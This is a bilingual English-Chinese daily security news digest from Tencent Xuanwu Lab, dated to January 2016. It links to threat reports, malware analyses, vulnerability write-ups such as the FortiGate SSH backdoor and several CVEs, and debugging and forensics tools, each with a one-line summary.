腾讯玄武实验室安全动态推送
Tencent Xuanwu Lab Security Daily News
-
[ Attack ] EMEA #CyberPredictions - Leadership become cyber security conscious. Full Report here: http://bddy.me/22Y3J1B https://t.co/Frlpo6mYk0
"FireEye 2016 中东和非洲地区安全趋势预测报告: https://t.co/Frlpo6mYk0 https://t.co/xHvHb5d391"
-
[ Attack ] In Brazil, anyone can be an overnight sensation in #cybercrime: http://bit.ly/1RzHzit #deepweb https://t.co/dLqQHq1KgV
"巴西地下网络犯罪调查报告,来自 TrendMicro: https://t.co/dLqQHq1KgV https://t.co/Oe0GfaV6el #deepweb"
-
[ Attack ] The Canadian underground is vastly different from its neighbor: http://bit.ly/1Z4qnR2 #deepweb
"加拿大的网络威胁现状,来自 TrendMicro Blog: https://t.co/CUxSRiPWrk "
-
[ Attack ] New RAT Trochilus Skilled at Espionage, Evading Detection https://asert.arbornetworks.com/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-Uncovering-the-Seven-Pointed-Dagger.pdf
"Seven Pointed Dagger - 新 APT 远控工具 Trochilus 以及其他定向威胁的发现,来自 Arbor 的分析报告: https://t.co/x0QCICfW8U"
-
[ Browser ] Bugs From Hell: Injected Third-party Code + Detours = a Bad Time - http://dblohm7.ca/blog/2016/01/11/bugs-from-hell-injected-third-party-code-plus-detours-equals-a-bad-time/
"来自地狱的 Bug - 对 Firefox Bug 1213567 的调试分析: https://t.co/OegeppqXfQ Bug 1213567: https://bugzilla.mozilla.org/show_bug.cgi?id=1218473 "
-
[ Debug ] ret-sync is a set of plugins that helps to synchronize a debugging session (WinDbg/GDB/LLDB/Oldbg2/x64dbg) with IDA https://github.com/bootleg/ret-sync
"ret-sync - 调试会话同步工具,用于 Windbg、GDB、LLDB、Oldbg2、x64dbg 与 IDA 之间的会话同步 https://t.co/PsKpFN4Ofw "
-
[ Device ] Turning a webcam into a backdoor http://blog.vectranetworks.com/blog/turning-a-webcam-into-a-backdoor via @ revskills
"给 D-Link WiFi 摄像头装一个后门: https://t.co/ehLEMOwoLI "
-
[ Device ] SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 http://seclists.org/fulldisclosure/2016/Jan/26
"FortiGate 系统 4.0~5.0.7 版本存在 SSH 后门, PoC: https://t.co/5OjXynsHDJ 来自 Security ToolKit 的《飞塔 SSH 后门 4900 台机器样本测试报告》: http://tools.pwn.ren/2016/01/12/%E9%9A%8F%E6%9C%BA4900%E5%8F%B0%E6%9C%BA%E5%99%A8%E6%A0%B7%E6%9C%AC%E6%B5%8B%E8%AF%95%E6%8A%A5%E5%91%8A.html 《飞塔SSH后门 进一步利用方法》: http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html 来自 Sebug 的后门在线检测: https://www.sebug.net/monster/?vul_id=90378 ZoomEye 对飞塔设备的扫描结果: https://www.zoomeye.org/search?q=FortiGate "
-
[ Device ] Some vulns affecting Samsung "Security" cameras(hint: trivial arbitrary file read with clear-text pwds) cc @ joystick http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html
"三星网络摄像机存在多个漏洞,包括任意文件读取漏洞(CVE-2015-8279)、固件弱加密漏洞(CVE-2015-8281)、用户可枚举漏洞(CVE-2015-8280): https://t.co/WWrFkwUIF7 "
-
[ Fuzzing ] Exploiting Trade-offs* in Symbolic Execution for Identifying Security Bugs : http://sas2015.inria.fr/sas_invited_talk.pdf (Slides)
"利用实用化的符号执行挖掘安全漏洞,来自 Thanassis Avgerinos 在 SAS Workshop 的演讲: https://t.co/vJJnF791e7 之前推送过相关的 Paper: http://repository.cmu.edu/cgi/viewcontent.cgi?article=1478&context=dissertations "
-
[ Hardware ] Counting bits in hardware: reverse engineering the silicon in the ARM1 processor http://www.righto.com/2016/01/counting-bits-in-hardware-reverse.html
"逆向 ARM1 处理器中的硅: https://t.co/5rXfPWgqwI "
-
[ iOS ] iOS 9.3 Beta 1 arm64 Jailbreak Demo (w/ Code Injection) https://www.youtube.com/watch?v=ZDMWIl3bde8
"iOS 9.3 Beta 1 arm64 越狱 Demo, Youtube 视频: https://t.co/SxvyQwgZ1a"
-
[ Linux ] Write a filesystem with FUSE - http://engineering.facile.it/write-filesystem-fuse/
"利用 FUSE 写一个文件系统 - https://t.co/eVV276TS72"
-
[ Linux ] Minnowboard Max: Enable the firmware (TXE) TPM 2.0 http://prosauce.org/blog/2016/1/11/minnowboard-max-enable-and-test-the-firmware-txe-tpm-20
"在 Intel Minnowboard MAX 开发板上启用固件 TPM 2.0 https://t.co/wRretxZ8qB"
-
[ Mac OS X ] Our #FOSS FSEvents parser for OSX and IOS is now available on Github https://github.com/dlcowen/FSEventsParser/tree/master #dfir #infosec as seen on the #forensiclunch
"OS X/iOS FSEvent 日志解析工具: https://t.co/SriH4eiJZR"
-
[ Malware ] Our first post! Inside Derkziel botnet https://mlwre.github.io/2015/12/11/Derkziel-Sofware.html
"深入分析 Derkziel Botnet: https://t.co/FRzIuLlPwo"
-
[ Malware ] Malware analysis with VM instrumentation, WMI, winexe, Volatility and Metabrik - http://www.metabrik.org/blog/2016/01/09/malware-analysis-with-vm-instrumentation-wmi-winexe-volatility-and-metabrik/
"利用虚拟机自省、WMI、winexe、Volatility、Metabrik 工具分析恶意软件: https://t.co/qf7mtjXDUz"
-
[ Malware ] Ransomware evolution: Another brick in the CryptoWall https://nakedsecurity.sophos.com/2016/01/11/ransomware-evolution-another-brick-in-the-cryptowall/
"CryptoWall 4.0 出现 - CryptoWall 的又一块板砖: https://t.co/PSF1utfUGV "
-
[ Malware ] MMD-0050-2016 - Incident report: ELF Linux/Torte infection (in Wordpress) http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html
"通过 WordPress 向服务器植入 ELF Linux/Torte Botnet,来自 MalwareMustDie Blog: https://t.co/hvrIR4RwQJ"
-
[ Malware ] Ransom32 – look at the malicious package http://blog.malwarebytes.org/intelligence/2016/01/ransom32-look-at-the-malicious-package/
"Ransom32 — 看看这个 JavaScript 勒索软件包的实现细节 https://t.co/F9yPUxN2ED"
-
[ Others ] New Post! Automatically Finding Weapons in Social Media Images Part 1 | Automating OSINT Blog http://bit.ly/1SKqqSq #osint #python
"在社交媒体中自动识别武器图片 Part 1: https://t.co/ViYUyKC1vG"
-
[ Popular Software ] SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for… http://goo.gl/fb/AyjmbI #FullDisclosure
"绕过 McAfee 关键设施系统的应用白名单限制,来自 SEC Consult 的 Paper: https://t.co/aYXWa8k0uy "
-
[ Popular Software ] Analysis of Adobe Flash Player ID3 Tag Parsing Integer Overflow Vulnerability (CVE-2015-5560) https://blog.coresecurity.com/2016/01/12/analysis-of-adobe-flash-player-id3-tag-parsing-integer-overflow-vulnerability-cve-2015-5560/
"Adobe Flash Player ID3 Tag 解析整数溢出漏洞分析 (CVE-2015-5560),来自 CoreSecurity Blog: https://t.co/3HX9oT2mRJ "
-
[ Popular Software ] . @ Adobe updates Reader and Acrobat, patches 17 code execution flaws https://threatpost.com/adobe-patches-code-execution-flaws-in-reader-acrobat/115863/ via @ threatpost
"Adobe Acrobat/Reader 发布补丁更新公告,本次修复了 17 个漏洞,其中 16 个可以实现代码执行: https://t.co/JAUE0QTuQ0 "
-
[ Vulnerability ] Analysis of CVE-2016-0035, A Remote Code Execution in Microsoft Office Excel http://sourceincite.com/2015/12/15/analysis-of-cve-2016-0035-a-remote-code-execution-in-microsoft-office-excel/ thanks to @ msftsecresponse & @ thezdi !
"Microsoft Office Excel 远程代码执行漏洞(CVE-2016-0035)的分析: https://t.co/7J0QwWe5xs "
-
[ Vulnerability ] Windows Remote Desktop Protocol Security Bypass Vulnerability – CVE-2016-0019 https://technet.microsoft.com/library/security/MS16-007
"Windows 远程桌面协议安全特性绕过漏洞 —— MS16-007(CVE-2016-0019) https://t.co/c4WWvniJti 微软本月的漏洞补丁公告摘要: https://technet.microsoft.com/en-us/library/security/ms16-jan.aspx 致谢信息: https://technet.microsoft.com/en-us/library/security/mt674627.aspx "
-
[ Web Security ] XSS Flaws lead to Keylogging,Webcams, & more http://neonprimetime.blogspot.com/2016/01/xss-flaws-lead-to-keyloggingwebcams-more.html
"通过 XSS 漏洞实现键盘记录、开启摄像头: https://t.co/GmLWojopyk"
-
[ Web Security ] A XSS may have exposed users of the eBay website to phishing attacks http://securityaffairs.co/wordpress/43521/hacking/ebay-website-to-phishing-attacks.html
"eBay 网站的一个 XSS 漏洞可能使用户受到钓鱼攻击: https://t.co/T5h8iplq4h "
-
[ Windows ] Quick tutorial on how to go from a dead Windows process to EoP. http://googleprojectzero.blogspot.com/2016/01/raising-dead.html
"复活死者 - 通过垂死的进程提权, 通过 NtCreateLowBoxToken 任意 handle 捕获的问题实现提权: https://t.co/jjH8FsUJRn NtCreateLowBoxToken Issue: https://code.google.com/p/google-security-research/issues/detail?id=483 "
